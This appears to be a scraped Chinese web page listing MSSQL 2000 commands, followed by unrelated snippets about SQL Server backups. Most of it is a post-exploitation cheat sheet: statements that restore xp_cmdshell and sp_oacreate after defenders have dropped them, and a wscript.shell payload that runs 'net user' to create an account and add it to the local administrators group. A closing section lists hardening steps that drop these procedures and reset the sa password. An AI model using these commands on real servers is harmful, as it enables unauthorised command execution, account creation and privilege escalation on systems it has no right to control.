恢复sp_addextendedproc语句:
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
xp_cmdshell新的恢复办法(不用去管sp_addextendedproc是不是存在)
删除
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'
恢复
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
1.未能找到存储过程'master..xpcmdshell'之解决方法:
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
2.无法装载DLL xpsql70.dll或该DLL所引用的某一DLL。原因126(找不到指定模块。)
sp_dropextendedproc "xp_cmdshell"
sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
3.无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因:
127(找不到指定的程序。)
exec sp_dropextendedproc 'xp_cmdshell'
exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
4.直接添加帐户法
删除odsole70.dll:
exec master..sp_dropextendedproc sp_oamethod
exec master..sp_dropextendedproc sp_oacreate
恢复odsole70.dll:
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
直接添加帐户命令:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe/c net localgroup administrators 用户名 /add'
5.恢复时一些常用的SQL语句:
利用sp_addextendedproc恢复大部分常用存储扩展(得先利用最顶上的语句恢复自己):
use master
exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'
exec sp_addextendedproc xp_dirtree,'xpstar.dll'
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
恢复cmdshell:exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
判断存储扩展是否存在(返回结果为1就ok):
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
恢复xp_cmdshell(返回结果为1就ok):
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.
sysobjectswhere xtype='x' and name='xp_cmdshell'
否则上传xplog7.0.dll:
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
************************以下为防范时用**********************
1.删除所有危险扩展:
Drop PROCEDURE sp_makewebtask
exec master..sp_dropextendedproc xp_cmdshell
exec master..sp_dropextendedproc xp_dirtree
exec master..sp_dropextendedproc xp_fileexist
exec master..sp_dropextendedproc xp_terminate_process
exec master..sp_dropextendedproc sp_oamethod
exec master..sp_dropextendedproc sp_oacreate
exec master..sp_dropextendedproc xp_regaddmultistring
exec master..sp_dropextendedproc xp_regdeletekey
exec master..sp_dropextendedproc xp_regdeletevalue
exec master..sp_dropextendedproc xp_regenumkeys
exec master..sp_dropextendedproc xp_regenumvalues
exec master..sp_dropextendedproc sp_add_job
exec master..sp_dropextendedproc sp_addtask
exec master..sp_dropextendedproc xp_regread
exec master..sp_dropextendedproc xp_regwrite
exec master..sp_dropextendedproc xp_readwebtask
exec master..sp_dropextendedproc xp_makewebtask
exec master..sp_dropextendedproc xp_regremovemultistring
exec master..sp_dropextendedproc sp_OACreate
Drop PROCEDURE sp_addextendedproc
2.删除xp_cmdshell扩展:sp_dropextendedproc 'xp_cmdshell'
3.修补sa弱口令:exec sp_password NULL,'新密码','sa'
分享到:
相关推荐
你需要熟悉MSSQL2000的备份模型,包括完整备份、差异备份和日志备份,以及如何进行灾难恢复和数据库恢复。 **数据库复制** MSSQL2000的复制功能允许你将数据分发到多个服务器,这对于分布式环境或数据同步非常有用...
### 总结 通过上述分析可以看出,MS SQL Server中的差异备份是一项重要的数据保护措施,能够有效地提高数据恢复的速度和效率。正确理解和使用差异备份可以帮助组织更高效地管理其数据库资源。同时,对于文档中出现...
总结起来,Pubs MSSQL示例数据库是学习和掌握MSSQL Server功能的重要资源。通过对Pubs数据库的深入研究和实践,我们可以提升数据库管理和开发的技能,更好地应对实际工作中的挑战。无论你是初学者还是经验丰富的专业...
总结起来,MSSQL精简版是一个针对个人和小型企业的高效数据库解决方案,它保留了核心功能,同时简化了安装和管理过程。用户可以通过静默安装快速部署,使用企业管理器进行基本的数据库管理,同时享受SQL Server的...
总结来说,“MSSQL数据库日志清理收缩工具”是一个为了简化数据库日志维护而设计的实用工具。它能够帮助用户高效地管理日志文件,释放磁盘空间,同时减轻DBA的工作负担。然而,理解和掌握MSSQL的日志管理原理仍然是...
总结来说,C#实现MSSQL数据库附加是一项常见且实用的任务,通过ADO.NET库与SQL Server进行通信,可以轻松地将MDF文件附加到指定的数据库。这个过程涉及到了数据库连接、SQL命令执行以及异常处理等多个关键环节,对于...
总结起来,“FGMfile recover for MSSQL”是一款针对MSSQL数据恢复的专业工具,它解决了传统数据恢复软件无法附加MDF文件的问题,为MSSQL用户提供了一条快速恢复数据的途径。正确理解和使用这类工具,能在关键时刻...
总结来说,MSSQL连接器V2.0是连接应用程序与SQL Server不可或缺的工具,它以强大的功能、易用的API和良好的兼容性,为开发者提供了便捷的数据访问通道。理解和掌握其工作原理和应用方法,将有助于提升开发效率,优化...
#### 六、总结 通过以上介绍,我们可以了解到MSSQL数据库自动备份的具体实现方法及其重要性。正确设置自动备份策略不仅能够提高数据的安全性,还能确保业务的连续运行。企业在实施过程中应结合自身需求制定合理的...
总结来说,MSSQL数据库备份精灵是针对SQL Server管理员的一款实用工具,提供自动化备份和恢复功能,确保数据的安全和业务的连续性。其重要性在于它可以减少人为错误,提高备份效率,并在灾难发生时快速恢复数据。...
总结来说,"mssql2000驱动包"是针对SQL Server 2000数据库的一个Java连接驱动,包含msbase、mssqlserver和msutil三个组件,分别负责基础服务、数据库交互和实用工具功能,主要用于Java应用与SQL Server 2000之间的...
总结来说,事务日志备份和恢复是一种有效保证大型数据库数据安全的策略,尤其是在数据量极大、完整备份所需时间较长的环境下。通常情况下,配合定时任务(job)来自动化执行日志备份会更加高效和安全。对于需要保证...
总结来说,MSSQL数据库中的数据生成为SQL语句文本文件是一个实用的功能,有助于数据备份、迁移和版本控制。通过SSMS、T-SQL命令或第三方工具,我们可以轻松完成这一任务。了解并掌握这些方法,对于任何MSSQL数据库...
在IT领域,MSSQL(Microsoft SQL Server)是一种广泛应用的关系型数据库管理系统,而Alwayson Availability Groups (AG) 是MSSQL中用于高可用性和灾难恢复的一种特性。Alwayson使得数据库可以在多台服务器之间进行...
标题中的“MSSQL加密/恢复存储过程、视图、触发器的存储过程”涉及到的是SQL Server数据库管理系统中的一种安全措施,即对数据库对象(如存储过程、视图和触发器)进行加密和解密的操作。这主要是为了保护敏感数据和...
总结来说,"数据库结构和数据对比工具(MSSQL)"是数据库管理员和开发者的重要辅助工具,它可以帮助用户发现并解决数据库间的差异,确保数据一致性。而压缩包内的文件则构成了该工具的组成部分,共同提供了全面的对比...
“mssql2000精品教程”涵盖了SQL Server 2000的各个方面,从基础操作到高级应用,为学习者提供了全面的知识体系。通过深入学习,不仅能够熟练掌握数据库管理,还能在实际工作中解决各种问题,提升工作效率。这个教程...
- **MSSQL2005**:备份和恢复流程相对直接,但在热备份和快速恢复方面,功能有限。 - **Oracle10g**:RMAN(Recovery Manager)结合Legato等工具,提供了热备份、快速恢复等高级功能,确保数据安全性。 ### 应用...
对于DBA而言,定期检查和维护备份策略,包括测试恢复流程,是保持数据安全性和业务连续性的关键。此外,建立良好的监控机制,及时发现并处理备份过程中出现的任何异常,也是防止数据丢失的重要环节。